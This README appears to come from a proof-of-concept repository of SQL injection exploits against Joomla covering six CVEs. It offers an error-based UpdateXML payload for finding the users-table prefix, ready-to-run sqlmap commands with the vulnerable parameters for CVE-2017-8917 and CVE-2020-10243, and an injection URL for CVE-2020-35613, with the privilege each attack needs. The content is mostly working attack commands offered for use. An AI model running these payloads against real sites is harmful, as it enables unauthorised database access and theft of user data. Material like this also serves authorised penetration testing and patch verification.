└── README.md


/README.md:
--------------------------------------------------------------------------------
 1 | # Joomla-SQLinjection PoC
 2 | 
 3 | 0. CVE-2020-35613
 4 | 
 5 | 1. CVE-2020-10243
 6 | 
 7 | 2. CVE-2019-19846
 8 | 
 9 | 3. CVE-2018-8045
10 | 
11 | 4. CVE-2018-6376
12 | 
13 | 5. CVE-2017-8917
14 | 
15 | # Payload to detect prefix table
16 | ## Step 1: Get hexa value
17 | *UpdateXML(2, concat(0x3a,(SELECT HEX(MID(TABLE_NAME,1,16)) FROM information_schema.tables WHERE TABLE_NAME LIKE 0x257573657273 LIMIT 1,1), 0x3a), 1)*
18 | ## Step 2: Convert hexa to ASCII
19 | +) Linux command: echo "hexa value" | xxd -r -p
20 | 
21 | +) Link: https://www.rapidtables.com/convert/number/hex-to-ascii.html
22 | 
23 | # 5. CVE-2017-8917
24 | ### User requirement: None
25 | ## Detecting:
26 | ![image](https://user-images.githubusercontent.com/24661746/77494259-ddd35680-6e77-11ea-8331-106c89b48f7c.png)
27 | ## Sqlmap:
28 | sqlmap -u "[your taget]/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=*" --dbms=mysql --technique=E --dbs
29 | ## Example
30 | sqlmap -u "http://192.168.119.128/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=*" --dbms=mysql --technique=E --dbs
31 | # 4. CVE-2018-6376
32 | ### User requirement: Manager (Lowest level)
33 | ## Detecting:
34 | ![image](https://user-images.githubusercontent.com/24661746/77607304-73d8b100-6f4c-11ea-9c6b-72a56c55efda.png)
35 | 
36 | ### Second-url:
37 | 
38 | ![image](https://user-images.githubusercontent.com/24661746/77607359-a7b3d680-6f4c-11ea-9f66-78b24b5ee895.png)
39 | 
40 | ## 3. CVE-2018-8045
41 | ### User requirement: Administrator
42 | ## Detecting:
43 | ![image](https://user-images.githubusercontent.com/24661746/77608547-25c5ac80-6f50-11ea-9495-b13b00448d1c.png)
44 | ## 2. CVE-2019-19846
45 | ### User requirement: Super Users
46 | ## Detecting:
47 | ...Update later-...
48 | ## 1. CVE-2020-10243: SQL injection in Featured Articles menu parameters
49 | # Author : Sam Thomas, Pentest.co.uk
50 | # PoC by : Hoang Kien
51 | ## User requirement: admin (Not superadmin)
52 | ## Type: Second Order SQL Injection
53 | ## Detecting:
54 | ![image](https://user-images.githubusercontent.com/24661746/78954200-8d115e00-7b05-11ea-8cd1-0d605fff4101.png)
55 | ## Second-url:
56 | ![image](https://user-images.githubusercontent.com/24661746/78954286-d2ce2680-7b05-11ea-9ffb-ec1263618056.png)
57 | 
58 | ## Exploit as video:
59 | https://vimeo.com/398763205
60 | ## Sqlmap:
61 |  *sqlmap -r sqli.joomla.req --level=5 --risk=3 -p "jform%5Bparams%5D%5Bfeatured_categories%5D%5B%5D" --dbms=mysql --second-url "[your domain/IP]/index.php" --technique=E --dbs*
62 | ## Example:
63 | sqlmap -r sqli.joomla.req --level=5 --risk=3 -p "jform%5Bparams%5D%5Bfeatured_categories%5D%5B%5D" --dbms=mysql --second-url "http://192.168.131.134:8080/index.php" --technique=E --dbs
64 | ## 0. CVE-2020-35613 : SQL injection in com_users list view
65 | # Author : ka1n4t
66 | # PoC by : Hoang Kien
67 | ## User requirement: admin (Not superadmin)
68 | ## Detecting:
69 | [your domain/IP]/administrator/index.php?option=com_users&view=users&filter[excluded]='
70 | 
71 | ![image](https://user-images.githubusercontent.com/24661746/102855478-50994e80-4457-11eb-8d6a-efeb51b9ac96.png)
72 | Reference:
73 | 
74 | 0. https://www.empressia.pl/blog/184-analiza-podatnosci-sql-injection-w-cms-joomla
75 | 1. https://pentest.co.uk/labs/advisory/cve-2020-10243/
76 | 2. https://xz.aliyun.com/t/6990
77 | 3. https://github.com/luckybool1020/CVE-2018-8045
78 | 4. https://www.notsosecure.com/analyzing-cve-2018-6376/
79 | 5. https://github.com/gottburgm/Exploits/tree/master/CVE-2017-8917
80 | 


--------------------------------------------------------------------------------